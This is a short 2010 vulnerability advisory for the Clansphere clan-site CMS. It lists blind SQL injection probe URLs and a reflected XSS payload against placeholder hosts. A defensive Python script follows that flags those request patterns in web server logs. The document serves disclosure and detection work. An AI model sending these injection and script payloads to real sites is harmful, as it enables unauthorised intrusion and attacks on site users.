############################################################################
#                                                                          #
# Exploit Title: Clansphere Multiple vulnerabilities                       #
# Date: 24/08/2010                                                         #
# Author: Sweet                                                            #
# Contact : charif38@hotmail.fr                                            #
# Software Link:                                                           #
# Download: http://sourceforge.net/projects/clansphere/                    #
# Version: all                                                             #
# Tested on: WinXp sp3                                                     #
# Risk : HIGH                                                              #
#                                                                          #
# Description : clansphere offers some nice features for                   #
# you to easily set up and maintain your proper clan site within minutes!  #
#                                                                          #
############################################################################

1- Blind SQL injection :

http://www.target.com/clanspherepath/index.php?mod=news&action=recent&id=0&from=list'+and+31337-31337=0+--+

http://www.target.com/clansphere/index.php?mod=news&action=recent&year=2009&month=8"+and+31337-31337=0+--+

2- XSS :

http://www.target.com/clansphere/index.php/>"><ScRiPt>alert("sweet")</ScRiPt>

Saha Ftourkoum and 1,2,3 viva L'Algerie :))
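
Defender-side log triage for the request shapes listed above, as an added example that is not part of the original advisory or of Clansphere's code. The access-log format, the sample lines and the expected parameter types (integers for id, year and month, a plain word for from) are assumptions based only on the benign values visible in the advisory's URLs.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: expected shapes inferred from the benign values in the advisory
# URLs (id=0, year=2009, month=8, from=list), not from Clansphere's source.
EXPECTED = {
    "id": re.compile(r"\d{1,10}"),
    "year": re.compile(r"\d{4}"),
    "month": re.compile(r"\d{1,2}"),
    "from": re.compile(r"[A-Za-z_]{1,32}"),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (common log format, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Aug/2010:10:00:01 +0000] "GET /clansphere/index.php?mod=news&action=recent&id=0&from=list HTTP/1.1" 200 5120',
    '198.51.100.7 - - [24/Aug/2010:10:00:05 +0000] "GET /clansphere/index.php?mod=news&action=recent&id=0&from=list%27+and+31337-31337=0+--+ HTTP/1.1" 200 5120',
    '198.51.100.7 - - [24/Aug/2010:10:00:09 +0000] "GET /clansphere/index.php?mod=news&action=recent&year=2009&month=8%22+and+31337-31337=0+--+ HTTP/1.1" 200 5120',
    '198.51.100.7 - - [24/Aug/2010:10:00:12 +0000] "GET /clansphere/index.php/%3E%22%3E%3CScRiPt%3Ealert(%22sweet%22)%3C/ScRiPt%3E HTTP/1.1" 200 5120',
]

def check_uri(uri):
    """Return findings for one request URI; an empty list means it looks normal."""
    parts = urlsplit(uri)
    findings = []
    # PATH_INFO is whatever follows the script name: /index.php/<extra>
    _, sep, path_info = unquote(parts.path).partition("index.php")
    if sep and re.search(r"[<>\"']", path_info):
        findings.append("markup characters in PATH_INFO")
    params = parse_qs(parts.query, keep_blank_values=True)
    if params.get("mod") == ["news"]:
        for name, pattern in EXPECTED.items():
            for value in params.get(name, []):
                if not pattern.fullmatch(value):
                    findings.append(f"unexpected value for '{name}'")
    return findings

def triage(log_lines):
    """Map 1-based line number -> findings for each log line that trips a check."""
    hits = {}
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if m and (found := check_uri(m.group(1))):
            hits[n] = found
    return hits

if __name__ == "__main__":
    for n, found in triage(SAMPLE_LOG).items():
        print(n, found)
```

A hit only marks a request for review; the durable fix is on the server side, with typed or parameterised handling of these values and output encoding of the request path.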